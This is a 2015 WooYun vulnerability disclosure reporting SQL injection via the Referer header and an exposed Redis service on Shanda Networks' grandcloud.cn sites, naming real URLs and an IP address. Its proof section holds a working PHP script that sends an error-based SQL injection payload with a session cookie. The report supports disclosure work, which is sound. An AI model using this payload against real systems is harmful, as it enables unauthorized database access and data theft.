当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121826

漏洞标题:盛大多处问题打包SQL注入未授权访问等

相关厂商:盛大网络

漏洞作者: scanf

提交时间:2015-06-20 20:55

修复时间:2015-08-07 16:06

公开时间:2015-08-07 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-20: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

就不一个一个的提交了.

详细说明:

http://video.grandcloud.cn//index.php?m=poster&c=index&a=poster_click&id=1

QQ截图20150620191838.jpg


http://web.grandcloud.cn/index.php?m=poster&c=index&a=poster_click&id=1

QQ截图20150620191928.jpg


存在Referer注入
115.182.77.156:6379

QQ截图20150620192534.jpg


漏洞证明:

<?php
set_time_limit(0);
//$id=$_GET["id"];
//$id=str_replace(" ","%20",$id);
//$id=str_replace("=","%3D",$id);
$cookie="PHPSESSID=mijiidm6gls48e9hkq02vtc3o3";
$url = "http://video.grandcloud.cn/index.php?m=poster&c=index&a=poster_click&id=1";
$referer="000',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#";
//$postdata = "";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIE, "$cookie");
curl_setopt($ch, CURLOPT_REFERER, "$referer");
// curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);//post的数据
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

修复方案:

版权声明:转载请注明来源 scanf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-23 16:04

厂商回复:

刺激吧

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-23 17:36 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    @盛大网络 刺激

  2. 2015-06-26 15:01 | 盛大网络(乌云厂商)

    哥 你知道有个插件叫hackbar吗 直接改referer

  3. 2015-07-03 22:37 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    知道呀 我练习写PHP呀